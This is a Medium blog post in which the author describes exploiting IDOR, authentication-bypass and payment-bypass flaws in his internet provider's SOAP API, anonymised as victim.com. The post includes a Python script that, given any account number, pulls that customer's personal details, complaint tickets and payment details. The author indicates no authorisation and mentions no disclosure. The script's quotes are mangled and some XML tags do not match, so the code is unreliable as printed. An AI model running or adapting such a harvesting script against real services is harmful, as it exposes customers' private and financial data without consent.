How i hacked my Internet Service Provider and automated the attack. ( Hacked to Learn)

Armaan Pathan
Feb 17, 2018 · 3 min read

I’ll be using victim.com as a site name in the article as i cannot disclose the name.It was a normal day and i was looking for some good internet plans as my current plan was ended. while i was checking the internet plans, my browser was hooked up with burp suite and i noticed the http traffic into burp history and found some mysterious endpoints and also i have found website’s API documentation link.So i looked up into the documentations and started fuzzing with the API parameters.
After spending 10–15 minutes in fuzzing parameters i have found IDOR that i was able to view any user’s personal information. Now again i started reading API documentation and again i have found multiple IDORS in the application that i was able to see complaint details, i was able to register a complaint from any user, was able to reset any user’s MAC address. And then i had found most critical issue that i was able to check any user’s payment details and also was able to bypass the payment gateway of the application and was able to do a recharge for free. But still if i want to perform this attack then i have to login into my account. So the scenario was still limited and i wanted to make this attack as more critical attack. so again i have started reading the Authentication API documentation and i have found that i was able to bypass the authentication over API and can call API without any authentications.
But still if i wanted to perform this attack then too i need to manually intercept the traffic in burp and changing different API endpoints for get such information. this was kinda boring so i had decided to automate an attack, for that i wrote small python script which is under

import requests, sys
import xml.etree.ElementTree as ET

uservalue = sys.argv[1]

def details(uservalue):
xml = “””<?xml version=”1.0" encoding=”utf-8" standalone=”no”?>
<soap:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=”http://www.w3.org/2001/XMLSchema" xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<victimDetail xmlns=”http://victim.com/">
<victimAccNo>{0}</victimAccNo>
</victimCustomerDetail>
</soap:Body>
</soap:Envelope>”””
xml = xml.format(uservalue)
headers = { ‘Content-Type’: ‘text/xml’, ‘SOAPAction’ : ‘http://victim.com'}
body = requests.post(‘http://victim.com', data=xml, headers=headers).text
xml_parsed = ET.fromstring(body)
root = xml_parsed[0][0][0][1][0][0]
print(“ — — — — — — -#################### User Details ####################### — — — — — — — — -”)
for element in root:
print(element.tag, ‘\t\t:\t\t’, element.text)
print
# acc_no = root[0].text
# user_id = root[0].text
# user_type = root[0].text
# acc_no = root[0].text
# acc_no = root[0].text
# acc_no = root[0].text
# print(acc_no)

def complaint_ticket(uservalue):
xml = “””<?xml version=”1.0" encoding=”utf-8" standalone=”no”?>
<soap:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=”http://www.w3.org/2001/XMLSchema" xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<victimTicketDetail xmlns=”http://victim.com">
<victim>{0}</victim>
<FromDate>01/01/2016</FromDate>
<ToDate>31/12/2018</ToDate>
</victimBBTicketDetail>
</soap:Body>
</soap:Envelope>”””
xml = xml.format(uservalue)
headers = { ‘Content-Type’: ‘text/xml’, ‘SOAPAction’ : ‘http://victim.com'}
body = requests.post(‘http://victim.com', data=xml, headers=headers).text
xml_parsed = ET.fromstring(body)
root = xml_parsed[0][0][0][1][0][0]
print(“ — — — — — — -#################### Complaint Tickets of User ####################### — — — — — — — — -”)
for element in root:
print(element.tag, ‘\t\t:\t\t’, element.text)
print

def payment_details(uservalue):
xml = “””<?xml version=”1.0" encoding=”utf-8" standalone=”no”?>
<soap:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=”http://www.w3.org/2001/XMLSchema" xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<victimPayment xmlns=”http://victim.com">
<victimID>{0}</victimID>
</victimPayment>
</soap:Body>
</soap:Envelope>”””
xml = xml.format(uservalue)
headers = { ‘Content-Type’: ‘text/xml’, ‘SOAPAction’ : ‘http://victim.com'}
body = requests.post(‘http://victim.com', data=xml, headers=headers).text
xml_parsed = ET.fromstring(body)
root = xml_parsed[0][0][0][1][0][0]
print(“ — — — — — — -#################### Payment Details of User ####################### — — — — — — — — -”)
for element in root:
print(element.tag, ‘\t\t:\t\t’, element.text)
print

details(uservalue)
complaint_ticket(uservalue)
payment_details(uservalue)

Now the automation is done and now i just need to run a python script and give an argument and it fetches all the sensitive information of any user.

Thanks for reading guys. Have a great day ahead. cheers !
:)

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade